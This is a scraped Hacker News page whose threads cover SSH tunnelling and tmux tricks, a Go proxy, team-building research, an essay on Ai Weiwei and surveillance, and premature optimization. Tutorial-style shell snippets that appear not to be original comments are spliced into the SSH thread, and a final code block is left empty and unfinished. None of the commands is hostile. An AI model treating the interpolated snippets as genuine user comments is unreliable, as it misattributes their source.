Why was this necessary? Since hub is a distributed tool, users will now have to download Go onto their local machines. Pretty big dependency, if you ask me.
Ancient Amulet Discovered with Curious Palindrome Inscription
20 points by Thevet  5 hours ago   discuss
Why aren't we using SSH for everything?
83 points by dkua  1 hour ago   34 comments top 9
ivan_ah 1 minute ago 0 replies      
Isn't there a problem when you tunnel TCP over TCP with increasing window sizes (auto throttling mechanism meant to prevent packet fragmentation)?

Every time I've tried to keep a long-running ssh tunnel for printing / http, the connection degrades after a while. I'm sure there are some flags that can be set, but I thought this was the major show stopper for "everything over ssh" (since ssh uses the TCP protocol).
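Keepalive options are the usual first thing to try for a tunnel that degrades over time. A hedged sketch (the host, ports, and forwarded service are placeholders, not from the comment); `-G` makes ssh print its resolved configuration without connecting, so the options can be previewed safely:

```shell
# Preview the effective settings for a long-lived tunnel without
# actually connecting (-G resolves the configuration and exits).
# ServerAliveInterval sends an application-level probe every 30s so a
# stalled connection is detected and torn down instead of silently
# degrading; CountMax=3 gives up after three missed probes.
ssh -G \
    -o ServerAliveInterval=30 \
    -o ServerAliveCountMax=3 \
    -L 8080:internal-web:80 \
    user@gateway.example.com | grep -i serveralive
# To open the tunnel for real, replace -G with -N.
```

Note this doesn't address the TCP-over-TCP interaction itself; it only keeps a half-dead connection from lingering.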

falcolas 1 hour ago 1 reply      
Neat trick, if you're so inclined to use such tricks:

    $ cat .ssh/authorized_keys
    command="tmux new-session -A -s base" ssh-rsa [...]
Automatically creates or joins a tmux session named base, and disconnects the SSH session when you disconnect from the tmux session.

So, yeah, why don't we use SSH for more?

forgottenpass 1 hour ago 1 reply      
"Why aren't we using SSH for everything?"

Because "Use X for everything" is a terrible design decision? SSH is a flexible transport with some desirable features, and it may be underutilized in practice.

This question is starting to feel like people who want to staple every pie in the sky idea to the bitcoin blockchain because it too has a set of desirable properties.

josephg 23 minutes ago 5 replies      
Because SSH requires several seconds to initiate a session, even on a local LAN.

Does anyone know why this is the case? It's always baffled me.
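Connection multiplexing is one common mitigation: later sessions reuse the first authenticated connection, so only the first one pays the handshake cost. A hedged sketch (hostname is a placeholder); again `-G` previews the resolved options without connecting:

```shell
# Reuse one master connection for subsequent sessions.  These options
# normally live in ~/.ssh/config; -G shows how ssh resolves them.
ssh -G \
    -o ControlMaster=auto \
    -o ControlPath='~/.ssh/cm-%r@%h:%p' \
    -o ControlPersist=600 \
    user@host.example.com | grep -i '^control'
```

Slow initiation is often also a server-side reverse-DNS or GSSAPI negotiation stall; those have separate knobs (`UseDNS no` in sshd_config, `GSSAPIAuthentication no` on the client).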

sharpneli 10 minutes ago 0 replies      
SSH can really be used for almost everything.

My favourite one: http://en.wikipedia.org/wiki/SSHFS

Whenever I'm developing for my mobile phone I actually have the contents mounted on my desktop via sshfs as an actual filesystem.

forfengeligfaen 1 hour ago 4 replies      
If you believe Jacob Appelbaum, we probably should not be using SSH for anything http://media.ccc.de/browse/congress/2014/31c3_-_6258_-_en_-_...
feld 1 hour ago 2 replies      
I wonder if his chat server has been hit by a botnet yet trying to ssh in and then sending tons of shell commands
shazow 1 hour ago 0 replies      
Sorry, the title has been revised to "Why aren't we using SSH for everything?", in case mods see this.
higherpurpose 1 hour ago 5 replies      
I read somewhere that SSH can be MITM'ed by a global adversary on the first visit (before it establishes the secure connection). Is that true?
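Yes, trust-on-first-use is SSH's known weak point: the first connection is only safe if the host key fingerprint is verified out of band. A hedged illustration of the fingerprint tooling, using a throwaway key generated locally rather than a real host key:

```shell
# Generate a throwaway key just to demonstrate the fingerprint tools.
rm -f /tmp/demo_host_key /tmp/demo_host_key.pub
ssh-keygen -t ed25519 -N '' -q -f /tmp/demo_host_key

# Print its fingerprint: the same kind of string the ssh client shows
# on a first connection.
ssh-keygen -lf /tmp/demo_host_key.pub

# On a real server you would instead run:
#   ssh-keygen -lf /etc/ssh/ssh_host_ed25519_key.pub
# and compare that string, over a trusted channel, with the prompt the
# client prints before you type "yes".
```

SSHFP DNS records and SSH certificate authorities (`ssh-keygen -s`) are the automated versions of the same check.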
Hyperfox HTTP/HTTPS proxy with dynamic SSL cert generation in Go
35 points by kylequest  5 hours ago   2 comments top
kylequest 3 hours ago 1 reply      
Nothing fancy, but still nice :-)

goproxy (https://github.com/elazarl/goproxy) has even more...

A Bibliographic Miracle
9 points by benbreen  3 hours ago   2 comments top 2
mrec 3 minutes ago 0 replies      
Why scramble the title? The article has "Bibliophilic", not "Bibliographic"; I was curious to see whether people really get that excited about a good list of references.
walterbell 14 minutes ago 0 replies      
> "Charles Ralph Boxer was born in 1904 to a distinguished British family of considerable means... His scholarship, both specialist and interdisciplinary, was gained by research and reading - he owned a library of institutional proportions - as well as by experience in his extensive travels.

How many future scholars will be educated by comparable books at the free and larger-than-institutional archive.org and international variants? No longer does one need to be born into a "family of considerable means" to gain the scholarly skills that come from curiosity and access to a quality library.

New Science on Building Great Teams
45 points by jeremynixon  7 hours ago   14 comments top 5
Fede_V 2 hours ago 1 reply      
Reading articles in that format drives me crazy. For example:

"For example, we now know that 35% of the variation in a team's performance can be accounted for simply by the number of face-to-face exchanges among team members"

Can I get a reference to a scientific paper that measures this or where this result is discussed? Off the top of my head - this depends hugely on the task at hand. Certain tasks require constant nonstop communication and updates - other tasks are more modular and the communication sweet spot is different. Even within the same task, different phases of the task require different amounts of communication - when you are whiteboarding the design of a particular library, constant feedback is exceptionally useful. When it's time to sit down and write difficult code involving pointer math, constantly discussing things will just throw you off.

I am sure there was some proper science done behind that number - but that number refers to teams of a certain size, working on a specific task, in a given context (I would also be curious to know the C.I. on that 35%). Trying to draw a nice narrative with a simple message from a narrow experiment is basically everything that I dislike about this Gladwell-esque style of pop science.

Reading narratives like this gives a completely unwarranted sense of confidence in something which we still understand very, very little about.

adunn 3 hours ago 1 reply      
"For example, we now know that 35% of the variation in a team's performance can be accounted for simply by the number of face-to-face exchanges among team members."

As someone who lives in a rural area I see a distributed team as the way to go for hiring talented individuals. I also know that working remotely can hurt communication and collaboration if extra effort is not given. It would be interesting to see a similar study on distributed teams and a comparison of how effective their different strategies and communication tools are. Do any remote workers here have any observational evidence on this?

dpritchett 4 hours ago 1 reply      
As much as I like the scientific method in most other aspects of life, Taylorism has always terrified me.
ThomPete 3 hours ago 3 replies      
Just as understanding the science behind music does not make you a good musician or allow you to build a great band, understanding the science behind teams does not make you a good team builder.

I look at these things as performance art. Theory goes in the background; when you perform, all that is left is execution.

trhway 2 hours ago 2 replies      
It isn't surprising that the identified communication patterns correlate well with a team being successful. Yet it is somewhat doubtful that such good communication can be enforced, i.e. good communication seems to be a manifestation of a good team, not what makes it.
Flapjack, monitoring notification routing and event processing
7 points by tylermauthe  5 hours ago   discuss
Ai Weiwei Is Living in Our Future
460 points by dirtyaura  23 hours ago   163 comments top 32
sp4ke 10 hours ago 9 replies      
I have always been fascinated by computers and passionate about programming. I never thought I would ever feel ashamed of my passion... that maybe I have been part of the decline of freedom and privacy, the same things I've always believed in and fought for. I finished reading 1984 again a short time ago, and I felt sick reading this article and realizing we're making a monster.

I stopped using Facebook a few months ago and it was not as easy as I thought. Since then, whenever people ask me I give them my views about keeping privacy and such... they always have the same reply: "Why would you want to hide something?" or "We can do nothing about it, everyone does it"... it makes me even sicker when it comes from tech friends who understand the consequences but just don't care about it.

rasengan0 15 hours ago 1 reply      
We'll all take the red pill someday, but I swallowed the blue one already. I found the article enlightening, reminding me of the continued complacency and abject indifference in favor of convenience and other affordances of mindless empty rewards (yay, startups!), much like the 1997 Radiohead song "Fitter Happier": https://en.wikipedia.org/wiki/OK_Computer

I missed the whole Ai Weiwei media storm due to disinterest and made-up assumptions about yet another dissenter getting hammered down by the State; like, duh? What else is new over "there"? Well, on the internets, where is there or here? The article actually made me pause playing FTL to Google Ai Weiwei and watch the streamed Netflix documentary: http://aiweiweineversorry.com/ Wow, here was someone who could have kept his mouth shut and kept kowtowing to rake in the bucks, but instead chose a new "career path" out of politics and got a fat tax bill for the trouble. Gutsy move or sending a message? Let's hope the next generation gives a damn.

XorNot 28 minutes ago 0 replies      
Ai Weiwei isn't living in our future; he's living in an actual totalitarian-ish nation-state.

The degree to which there's this encouraged ignorance of what the Chinese government is all about is the story of greater concern here: they've never not been a brutal regime, they're just a trade partner now, so the narrative has shifted.

What they do, and what they can do isn't enabled by technology. It's enabled by the simple political and military will to actually kick in doors and arrest and execute people.

You want to not live in that world? Then you inform people why the no-fly list is stupid, for a start. How such a list is distributed, generated or updated is irrelevant.

Punoxysm 17 hours ago 3 replies      
Even if his criticisms of coveillance are correct, I still think the world is headed that way.

Simply put, you can't put the genie back in the bottle. We passed a similar threshold with industrialization and the consequent removal of autonomy for workers on several levels (is the 1800s factory of exacting time cards and constant repetitive movements that far behind the warehouse the author describes?). It was a tumultuous transition (strikes, revolution, communism, etc.), but we made it through. The transformation in state and corporate power that tools like surveillance bring will be similar, but just like in the industrial revolution we can't turn back the clock and have to instead ride out whatever happens.

sabalaba 19 hours ago 4 replies      
Pretty alarmist writing. "I therefore can't resist showing a new piece of Google technology: the military robot WildCat made by Boston Dynamics, which was bought by Google in December 2013". And goes on to show a video of something that was funded by DARPA well before Google purchased Boston Dynamics. Google has already said multiple times that it won't be pursuing any military contracts.
jeffhiggins 17 hours ago 4 replies      
The uncomfortable truth is that many HN readers are the ones gleefully building these tools.
MichaelTieso 6 hours ago 0 replies      
For those in the SF area, I highly recommend going to Alcatraz to experience some of Ai Weiwei's work. http://www.for-site.org/project/ai-weiwei-alcatraz/

Never Sorry is a fantastic documentary on Ai Weiwei's life. I contributed to the documentary while it was on Kickstarter and got to see it in a theater in DC. http://aiweiweineversorry.com/

kingkawn 16 hours ago 1 reply      
In the efforts to improve surveillance they have given us the tools to subvert it. Yes, they can watch us all, but we can also all watch each other. Yes, we have nothing to be ashamed of, and they no longer control the ability to spread ideas about what is shameful. When they are abusing one person, everyone can know.

Ai Wei Wei would not still be in communication with the world without the same technology that is permitting his surveillance.

At the same time as the surveillance state is growing, we are being told that all of the platforms that have the broadest potential reach are lame. That Facebook is not cool, so any messages you send out on it will be judged by the medium, not the message. We have more than enough power already to reach each other with messages that spread faster than a security state can quash them. The Chinese government's control isn't growing, it's faltering. The US government's control isn't growing. They know more about us all, and can do less to us.

hansdezwart 9 hours ago 2 replies      
For me as the author of the piece, it is wonderful to find an informed and critical discussion of the themes that I tried to discuss here in the comments. I will likely try and answer some of them here in the next couple of hours and am happy to answer any questions.
tomaskafka 2 hours ago 0 replies      
"Hannah Arendt's understanding of the political domain of the classic city would agree with the equation of walls with law and order. According to Arendt, the political realm is guaranteed by two kinds of walls (or wall-like laws): the wall surrounding the city, which defined the zone of the political; and the walls separating private space from the public domain, ensuring the autonomy of the domestic realm.

The almost palindromic linguistic structure of law/wall helps to further bind these two structures in an interdependency that equates built and legal fabric. The unwalling of the wall invariably becomes the undoing of the law."

"The breaching of the physical, visual and conceptual border/wall exposes new domains to political power, and thus draws the clearest physical diagram to the concept of the state of exception."

"Future military operations in urban terrain will increasingly be dedicated to the use of technologies developed for the purpose of the unwalling of the wall.

This is the architects response to the logic of smart weapons. The latter have paradoxically resulted in higher numbers of civilian casualties simply because the illusion of precision gives the military political complex the necessary justification to use explosives in civilian environments where they cannot be used without endangering, injuring or killing civilians.

The imagined benefits of smart destruction and attempts to perform sophisticated swarming thus bring more destruction over the long term than traditional strategies ever did, because these ever more deadly methods combined with the highly manipulative and euphoric theoretical rhetoric used to promulgate them have induced decision makers to authorize their frequent use. Here another use of theory as the ultimate smart weapon becomes apparent. The military's seductive use of theoretical and technological discourse seeks to portray war as remote, sterile, easy, quick, intellectual, exciting and even economic (from their own point of view). Violence can thus be projected as tolerable, and the public encouraged to support it."

Eyal Weizman

Lethal Theory


LiweiZ 17 hours ago 2 replies      
Sorry to digress here. Just want to comment on Ai. He is like many other iconic/famous people in the country, who get awards abroad, do things that seem to be against the ruling party, and basically walk away with far fewer consequences almost every time. Some of them go to jail for short terms like heroes, and after that their experience is worth much more. This is very interesting, since average people would probably face fatal consequences if they did something like that even once.
ekianjo 15 hours ago 1 reply      
That was a painful essay. No real point hammered through, jumping from one topic to another without clear logic, and again making it look like companies will be ruling the world in the future, while the surveillance capabilities of governments far exceed what companies can hope to achieve, because companies cannot centralize all channels of information.
brianbarker 17 hours ago 1 reply      
The mentioned novels seem cool, but an even better reference is Feed. Published in 2002, before MySpace was a household name, it pretty much hits the nail on the head in terms of surveillance, marketing and connectedness.
narrator 3 hours ago 0 replies      
The Pavlok is really disturbing but cool at the same time. It's such a perfect example of technology that could be used for good or evil.
mmanfrin 16 hours ago 0 replies      
Eggers' book that he mentions, The Circle, has unnerved me since I read it. I've noticed myself looking at things I do through the lens of that book, and then continuing with that action. It's like I'm on a bus that's headed for a cliff, and I've resigned myself to the fact that it's going to go over, so I might as well sit comfortably rather than make a fuss.
j_lev 9 hours ago 0 replies      
I wish I had read this before Christmas as I was stuck for gifts for younger people.
drumdance 5 hours ago 1 reply      
That picture of him in a cell with two guards looks like something out of a wax museum.
courtf 14 hours ago 2 replies      
"According to him, we have allowed efficiency thinking to optimize our world to such an extent that we have lost the flexibility and slack that is necessary for dealing with failure. This is why we can no longer handle any form of risk."

This rings true to me in many ways, particularly in the way we treat our children. I may have to read Antifragile.

jgon 18 hours ago 1 reply      
This is easily the most important article currently on the front page. At times its poignancy reminded me of some of the talks by Maciej Ceglowski, aka the guy who runs Pinboard, but this talk is a bit more direct and a bit less funny.

The world of coveillance or sousveillance sounds attractive, but I think that a quick look at the state of computing for the average person, and their ability to organize photos, run their own email server, or any number of tasks that would be somewhat analogous to the ability for citizens to have some form of meaningful technological power against large corporations and the government, should dispel this notion pretty quickly.

The frog is being slowly boiled right now, and I honestly don't have any answers about what to do. All I can think is just to do what I can to use free software, support organizations like the EFF and Mozilla, and work to make sure that my life isn't completely captured by giant companies like Google and Apple, as I also try to remain politically engaged at home.

Maybe that's all any of us can do.

jqm 1 hour ago 0 replies      
Eh... in my experience, most people simply aren't worth watching very closely.

Favorite part of the article..."he used Craigslist to hire somebody to help him improve his productivity. The idea was that the person would come sit next to him and give him a slap whenever he would not be working..."

Love the idea. I recently had a talk w/ my boss about how I was thinking about leaving, because I was making many times more on the side than I was with the company. But the one caveat... I needed him to keep being my boss and check on what I was doing. Make sure I was at my desk at 7:30 coding away and didn't go home until 5. He laughed quite a bit and said to think about it. I am.

I'm not in favor of massive surveillance, but sometimes knowing we are watched a little helps us at certain times....

deanclatworthy 14 hours ago 0 replies      
This documentary looks fantastic. I'm looking forward to watching this and Citizenfour.

A note to anyone who might be reading this before the article, don't read it all as it contains spoilers from the documentary.

Kiro 11 hours ago 0 replies      
That's a fantastic trailer. I need to see this.
rcyn 13 hours ago 2 replies      
"One of the best artists in the world." Since when do people rank artists? For me, this ruins the whole article. Maybe a successful artist, or an artist with a high media profile. But best? Seriously?
squozzer 5 hours ago 0 replies      
Pardon me for "going meta", but it seems that power in the internet age may be less about how much information you have than about how much information you can keep out of the hands of others.

For example, just how transparent is Schmidt's or Zuckerberg's lives compared to ours?

Or why the US govt seems to be classifying greater and greater quantities of information?

And whether such asymmetries of power help or hurt our welfare.

ageek123 18 hours ago 1 reply      
We don't need to throw the baby out with the bath water. We just need to make sure government doesn't get too much power. This doesn't have anything to do with Google or Apple (they can't put you in jail).
Intermernet 11 hours ago 1 reply      
"Your lunchtime is exactly 29 minutes. You are fired on the spot if you take a 31 minute lunch as that messes with the planning capabilities of the system."

This is meant to describe "a large shipping warehouse in the US ... (think Amazon)" logistics system. Is this actually in any meaningful way true? If so, I'm disgusted, naive and disappointed.

EGreg 12 hours ago 0 replies      
I wrote quite extensively about this. For example:


knappador 9 hours ago 1 reply      
I don't really buy the privacy paranoia anymore these days. It was the internet that first grew the distance between people so that we could pretend-anonymously say things about anything without repercussion, and it will be the internet that shrinks that distance down to where you'd better be talking about what matters to you and putting your money where your mouth is.

In ten years I'll be sharing and leaking at least 10x as much information out of all kinds of devices. 90% of my engagement will happen inside programs that will be automatically syncing data across cloud services. Security is inevitably a growing target in the networked world, and privacy requires security. Increasingly, for the sake of productivity and collaboration, everything I use will be sharing and syncing more and more. The desire of most people to be connected and productive, not some autocratic slide in the world's governments, will be the death of privacy.

One of the features of Facebook I liked in the early days was just the slight exclusiveness that made it basically okay to talk about having a giant hangover without fear of looking like an alcoholic to an interviewer scratching up dirt (I think zero interviews I care about do this). When Facebook started making the defaults public etc. without notifications, there was understandably some uproar about being unknowingly thrust out into the public. Eroding privacy causing blunders is not the same thing as not having privacy. For the most part, anxiety about not being able to control your privacy or security really needs to be analyzed in the context of just how hidden you really need to make your words (in the case of anti-dissent government) or actions (in the case of socially conservative laws) to be able to practice or advocate what it is you care about. To an almost absolute degree, very few of the things you want to see in the world that don't exist yet are going to require going to war for the cause of security or privacy before your end goals can be pursued, so it's just not really worth it.

EFF does great work to defend people against stupid laws and to promote better laws with regard to IP etc. They protect anonymity for regular people that happen to cosplay and have very odd taste in character appropriateness. However, the area where the EFF pulled really hard to ensure that the future of the internet would be egalitarian in the United States was about Title II common carrier law, not about privacy. The 1st amendment protects what you say, not some mythical right to say it without consequences; you only get that when nobody cares about your opinion. Even in the case of socially conservative laws, stand up for respect for individual beliefs before you stand up for privacy as an extra-social cure.

Privacy is not nearly as fundamentally important as the security that is required to achieve it, and privacy advocacy is to an extent like whining that someone took your tree-house and you can't have any secret clubs anymore. Most privacy is not used to do productive things, and few productive things outside of already entrenched, authoritarian governments require privacy to pursue.

bluekeybox 16 hours ago 0 replies      
No, he's not.
guoqiang2 18 hours ago 3 replies      
I didn't go through this TL;DR writing, just briefly scrolled the page.

I was amazed that the author could connect Ai Weiwei with the WildCat robot, an image of Obama calling from a camp, and a kid in a car using a Disney product.

How does this all connect together?!

If you want to talk about surveillance or privacy, wouldn't the NSA's Snowden be a more famous and impactful example?

sfeng 18 hours ago 2 replies      
> The young boys that had to guard Ai Weiwei in his cell had to stand completely still, weren't allowed to talk and couldn't even blink their eyes.

This is complete nonsense. You can't order someone to not blink.

tim333 9 hours ago 0 replies      
Ai Weiwei is not living our future. I'm a big fan of Weiwei, but being the best-known opposition figure against the world's largest dictatorship is something that's unlikely to happen to most of us. Also, his "Fuck your mother, the party central committee" themed photos are obviously trying to wind them up. Here in London we have CCTV everywhere and the secret services no doubt have the ability to bug me and read my mail, but it affects me and most people not at all; no one is especially interested. I'd be honoured to be Weiwei.
We Used to Recycle Drugs from Patients' Urine
8 points by Petiver  3 hours ago   3 comments top 2
dalke 3 hours ago 0 replies      
The history is more tragic than that light-hearted story lets on. Quoting from Wikipedia:

> Albert Alexander was a constable in the police force of the County of Oxford, England.[1] In December 1940, Constable Alexander was accidentally scratched by a rose thorn in his mouth. By the end of the month the scratch was badly infected with both Staphylococcus and Streptococcus and Constable Alexander was hospitalised in the Radcliffe Infirmary. Despite efforts of various treatments, Alexander's head was covered with abscesses and one of his eyes had been removed. ...

> On 12 February 1941, Constable Alexander was given an intravenous infusion of 160 mg (200 units) of penicillin. Within 24 hours, Alexander's temperature had dropped, his appetite had returned and the infection had begun to heal. However, due to the instability of penicillin and the war time restrictions placed on Florey's laboratory, only a small quantity of penicillin had been extracted and, although Florey and colleagues extracted any remaining penicillin from Alexander's urine, by the fifth day they had run out.[1]

> Constable Alexander died on 15 March 1941.[2]

> Florey and his team decided only to work on sick children who did not need such large amounts of penicillin, until their methods of production improved.[4]

iopq 51 minutes ago 1 reply      
Why not still do this to save costs? Also, the aforementioned environmental effect.
Improving math performance in glibc
4 points by LaSombra  31 minutes ago   discuss
Considering performance in the small is not premature optimization
90 points by mef  4 hours ago   62 comments top 22
syntheticnature 3 hours ago 1 reply      
Physician, heal thyself.

It always seemed evident to me that Knuth's exhortation was about making sure that the thing you were optimizing was in fact a major contributor to run time -- and that your change was an improvement.

Telling people to avoid, for example, bounds checking because it might turn out to be a cycle soak later sounds like a good way to make your software worse, not better, in the hopes that a few instructions saved will make the difference. I once worked on a code base with three different half-right hand-hacked versions of date formatting code. I replaced them with strftime(). Certainly the call was slower, but I was provably better off optimizing the timer routine that ran 50 times a second than worrying about hand-formatting dates into strings.

knightofmars 2 hours ago 1 reply      
I had a professor that used to say, "Make it work and then make it work fast." The point being that you need to both understand and solve the problem before you can figure out how to make the solution faster. It is the reason that the concept of a prototype exists in every engineering discipline.

As an additional perspective, compare the solution of an engineer with 2 years of experience to that of an engineer with 5 years of experience. If the solutions are drastically different then interpretation of a rule such as "avoiding premature optimization" will be drastically different as well.

Like any overly simplified statement, it is actually highly subjective. The author of the article even calls out the specific context in which their interpretation of Donald Knuth's rules is being applied, "I've listed lots of relatively low-level things up there, but that's just because it's the level I work at." and as such their interpretation doesn't necessarily apply in other contexts.

Premature optimization is a problem if you're approaching it from a place of ignorance. If you're doing it mindfully based on experience and domain knowledge then it starts to make sense. But even under these conditions your best intentions can be wrong. I've been in plenty of situations where I thought I'd identified a code bottleneck only to have a far easier, cheaper, and better solution completely unrelated to code come to light.

mmahemoff 3 hours ago 1 reply      
"The website is temporarily unable to service your request as it exceeded resource limit. Please try again later."


rajat 3 hours ago 0 replies      
All too often "premature optimization" is brought up as an argument against carefully thinking about what you're implementing prior to actually opening up the IDE and madly coding tests.

Thinking is hard, and takes time, and we want to get the feature out now, immediately, and worry about performance later. If at all.

And, sad to say (for an engineer), it's not clear that from a "business" perspective it's wrong. Hard to argue when accumulating features seems to matter more than crappy software. We have a lot more software these days, to run all of these bright new pieces of hardware, and perhaps because I'm an old-timer, the general quality seems to have degraded significantly. But the novelty of the stuff certainly has exploded, and I'm continually delighted by the twists and features that folks are coming up with, while being saddened by crashes, slowdowns, need for restarting, etc.

eterm 3 hours ago 3 replies      
Today I had to debug code with some database calls within 5 levels (at least) of for-each loops.

I stopped measuring at ~40,000 database round-trips.

"Engineering time costs more than CPU time" was the attitude, and for the original problem in its original specification, the solution was clearly OK.

But here we are, now needing to work out the original specifications, work out the current implementation (in case they differ anywhere), and work out whether it's worth re-writing it top-down or just fixing the worst of the loops.

And I'm not blaming whoever wrote this originally, it must have done its job to make it into the code base, but it really sucks to have to unpick it because an assumption of "database calls are free" is an assumption that unravels in a really messy way.
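
The cost gap eterm describes can be sketched with Python's built-in sqlite3 module as an in-memory stand-in for the real database (table and values are illustrative). Against a networked database, each round-trip in the first version adds latency; the batched form makes one trip:

```python
import sqlite3

db = sqlite3.connect(":memory:")
db.execute("CREATE TABLE items (id INTEGER PRIMARY KEY, name TEXT)")
db.executemany("INSERT INTO items VALUES (?, ?)", [(1, "a"), (2, "b"), (3, "c")])

ids = [1, 2, 3]

# N+1 style: one round-trip per id -- cheap against an in-memory stand-in,
# ruinous against a database on the other side of a network
one_by_one = [db.execute("SELECT name FROM items WHERE id = ?", (i,)).fetchone()[0]
              for i in ids]

# Batched: a single query fetching all rows at once
placeholders = ",".join("?" * len(ids))
batched = [row[0] for row in
           db.execute(f"SELECT name FROM items WHERE id IN ({placeholders}) "
                      "ORDER BY id", ids)]

assert one_by_one == batched == ["a", "b", "c"]
```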

hindsightbias 3 hours ago 2 replies      
For some reason, the vast majority of developers take 'premature' to be a synonym for 'any'.

If CS majors spent a fraction of the time learning how to optimize the way EE/CEs do, we'd need a lot less magic from the latter.

jayvanguard 1 hour ago 0 replies      
Yes, yes it is. Simply asserting the opposite doesn't suddenly invalidate an entire industry's decades' worth of experience.

One good point from the essay, though, is Knuth's example that a 12% speed increase for low effort is definitely worth pursuing. I agree.

A better way of putting things is:

Considering low effort, small performance improvements that don't affect other factors such as code readability or system maintainability is not "premature optimization".

If you are considering performance "in the small" and it affects maintainability, you are indeed prematurely optimizing.

pekk 3 hours ago 3 replies      
"Premature" means "before measuring"
ky3 2 hours ago 0 replies      
Nobody's arguing that speed isn't important. What's more important is to get things right.

And no, incorporating speed in the specification doesn't make any difference. Suppose the spec says, "page must load in 200ms." Fine, if you don't care what correct page loading means, you're perfectly served with a blank one.

What's at the root of such intellectual capitulation? Complacency? Absence of skills? "Correctness is hard, let's just randomly perturb settings instead while fiddling with a stopwatch. Correctness is hard, let's just conflate motion with progress."

Whence the shabby treatment of correctness like porn: I'll know it when I see it.

dyadic 1 hour ago 0 replies      
I'm very happy to see this article and more people taking this mindset.

Many people don't even know the context or the original quote. And many times I've seen discussions about improving a piece of code shot down by a single incantation of this Knuth quote. It's sad.

0xdeadbeefbabe 1 hour ago 0 replies      
Your small is another man's big. So, "don't prematurely optimize" could be said another way, "a different point of view is like losing 80 IQ points" or you could say it positively like Kay does http://en.wikiquote.org/wiki/Alan_Kay, but I think he's only positive because he drinks once in a while.
lnanek2 2 hours ago 0 replies      
Hmm, he complains about the awesome bar being coded inefficiently, but I'm on a several-year-old laptop and the awesome bar is pretty much instant at showing results when I type a key. So his evidence is not compelling in my experience. Reading his links, it sounds like his memory-error-checking tool is what causes the slowdown, not the usual Chrome code. Kind of bizarre that he's pointing fingers at others when his own stuff is the problem that needs to be worked on.

His whole argument boils down to:

> Considering performance in the small is not premature optimization, it is simply good engineering, and good craftsmanship

But that's the same reason German industry tends to compete so badly right now. They do a lot of hand trimmed and finished components that really could have been better designed for automation and require less custom craftsmanship. His argument seems to boil down to aesthetics.

bcheung 2 hours ago 0 replies      
Considering performance is a basic tenet of software architecture and engineering. Obsessing about it needlessly is the "premature" part. Considering the business case is the most important thing to remember.
stevebot 3 hours ago 1 reply      
The problem I have found is not early optimization, but knowing what to optimize early and what can wait. Everything in a system can be optimized, but there obviously isn't the time to do this.

I work in Android, so the optimizations I look at first are bitmap loading, backgrounding tasks, and sqlite queries. Usually, this is where 90% of the performance benefit comes from.

sp332 3 hours ago 1 reply      
skybrian 1 hour ago 0 replies      
This article is not that well optimized. It could have been much shorter. I think just the lesser-known Knuth quote would be enough.
michaelvkpdx 3 hours ago 0 replies      
Brilliant blog. Thank you for writing this. Optimization is important! You don't have to tune everything to the fastest possible speed. But remember, in web programming, you may be writing a function that is called 10 or 100 or 500 times per request. That little optimization will add up quickly.

Be smart when developing, and know where the easy optimizations and common pitfalls are in your language and toolset. Optimize as you can without sacrificing maintainability.

current_call 2 hours ago 0 replies      
"As a developer, I am tired of my IDE slowing to a crawl when I try to compile multiple projects at a time. I am tired of being unable to trust the default behavior of the standard containers. I am tired of my debug builds being unusably slow by default."

Don't forget web browsers. Web browsers are horrible.

ajarmst 3 hours ago 0 replies      
The way I phrased it once (thankfully no students complained) is that premature optimization is like premature ejaculation. You don't want to do it too early, but it is important to get to it eventually.
Toine 3 hours ago 1 reply      
TLDR : sometimes you need to optimize.

I don't understand what's new.

PythonicAlpha 2 hours ago 0 replies      
He is right.

He is right about premature optimizations and also right about craftsmanship.

Many performance problems stem from bad overall design decisions, bad abstractions and bad data structures (summarized: craftsmanship). I always wonder, how fast today's processors have become and how slow they get with today's software.

One of my first computers had 64k of memory and a processor that was so incredibly slow compared to today's processors that it is unbelievable. And still, so much good software was made with it. In today's programs the resources of this computer would not suffice for the idle loop.

Also the first Unix computer that I worked on had only 8MB of memory and ran X11, LaTeX and much other stuff!

We have come such a long way down the road of abstractions that today's computers can hardly get by with 1GB of memory and a 1GHz processor (2 cores, please, please!) for basic usage.

The real art in computer science is to know where to optimize -- to use your time most effectively.

dang 2 hours ago 2 replies      
We changed the title to a representative sentence from the article. If anyone can suggest a better one, we'll change it again.
Data Structures for Text Sequences (1998) [pdf]
20 points by ashish01  4 hours ago   1 comment top
topherjaynes 3 hours ago 0 replies      
I don't know if the first line of the abstract is the most ironic typo, or a joke.

'to' is out of sequence

"The data structure used ot maintain the sequence of characters is an important part of a texteditor."

A Hacker's Hit List of American Infrastructure
12 points by mparramon  2 hours ago   discuss
How to build a simple image and primary-colour similarity database
62 points by teh  8 hours ago   11 comments top 7
jerluc 1 hour ago 0 replies      
For those of you interested in this subject, there is a library called LIRE (http://www.semanticmetadata.net/lire/) that's been around for a long time which will index various color and textures features into a feature vector compatible with Lucene. It does end up with the interesting scenario of requiring the search query itself to be an image, but if you are looking for a solution whereby for a given image you can find other images most similar to it (and ranked, of course), this does the job surprisingly well.
cordite 8 hours ago 1 reply      
The first thought I had would be to put this into HSV, and then index that with an R-tree [1]. This way, you can do nearest neighbor kind of stuff, similar to geospatial indexing.

[1]: http://en.wikipedia.org/wiki/R-tree
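
The RGB-to-HSV conversion half of this idea is already in Python's standard library; the R-tree itself would come from a spatial-indexing library, so only the conversion is sketched here:

```python
import colorsys

def rgb_to_hsv_point(r, g, b):
    """Map an 8-bit RGB colour to an (h, s, v) point suitable for
    nearest-neighbour indexing in a spatial structure like an R-tree."""
    return colorsys.rgb_to_hsv(r / 255.0, g / 255.0, b / 255.0)

point = rgb_to_hsv_point(255, 0, 0)  # pure red: hue 0, full saturation/value
assert point == (0.0, 1.0, 1.0)
```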

leeoniya 7 hours ago 0 replies      
> A few obvious choices are a better ranker or transforming to perception-friendly colour spaces like HSV.

HSV is not good for perceptual comparison. Try HSP [1].

[1] http://alienryderflex.com/hsp.html

btown 7 hours ago 0 replies      
As with anything in image machine learning, it's all about the complexity of your feature space and how well it captures your business needs. Starting with nearest-neighbors with color-based features is a great starting point, and it's always great to see posts that start from scratch and show how far you can get.

For those interested in some of the commercial solutions in the space, Cortexica ( http://www.cortexica.com/ ) is doing interesting work using neural networks for fashion image similarity. Sadly, they seem to be focusing on white-label solutions rather than having an API.

spdustin 7 hours ago 2 replies      
Why not a quick check of the upper-left pixel color, and if that's similar to one of the identified "popular" colors, remove it? I'd suspect most of the source material would be photographed professionally on a uniform background color.

I chose upper-left simply because these sorts of photos would likely would be framed in a way that the background is visible in the upper margins, while possibly cropping the object at the bottom of the frame.
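
A rough sketch of this heuristic, with no imaging library: the "image" is plain rows of RGB tuples, the corner pixel is assumed to be background, and the distance threshold is an arbitrary illustrative value (a perceptual colour space would compare better than raw RGB):

```python
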